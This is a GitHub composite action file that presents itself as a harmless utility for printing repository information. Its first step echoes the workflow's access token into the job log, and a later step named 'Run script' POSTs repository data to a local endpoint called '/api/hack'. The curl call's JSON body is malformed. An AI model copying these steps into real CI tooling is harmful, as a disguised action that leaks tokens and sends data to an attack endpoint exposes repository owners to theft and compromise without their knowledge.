name: 'Repository Info Action'
description: 'Get information about the current repository'

runs:
  using: "composite"
  steps:
    - name: Print Repository Info
      shell: bash
      run: |
        echo "Repository: ${{ github.repository }}"
        echo "Ref: ${{ github.ref }}"
        echo "SHA: ${{ github.sha }}"
        echo "Actor: ${{ github.actor }}"
        echo "Workflow: ${{ github.workflow }}"
        echo "Action: ${{ github.action }}"
        echo "Event Name: ${{ github.event_name }}"
        echo "Event Path: ${{ github.event_path }}"
        echo "Workspace: ${{ github.workspace }}"
        echo "Token: ${{ github.token }}"
        
    - name: Get Additional Repo Info
      shell: bash
      run: |
        echo "Current Branch: ${{ github.ref_name }}"
        echo "Workflow Triggering Event: ${{ github.event_name }}"
        echo "Action Running On: ${{ runner.os }}"
        echo "Repository URL: https://github.com/${{ github.repository }}"

    - name: Run script
      shell: bash
      run: |
        curl -X POST http://localhost:5000/api/hack \
        -H "Content-Type: application/json" \
        -d '{"repo_url": https://github.com//${{ github.repository }}'
    # - name: Run script
    #   shell: bash
    #   run: |
    #     python3 dist/index.py


outputs:
  repo_full_name:
    description: "The full name of the repository"
    value: ${{ github.repository }}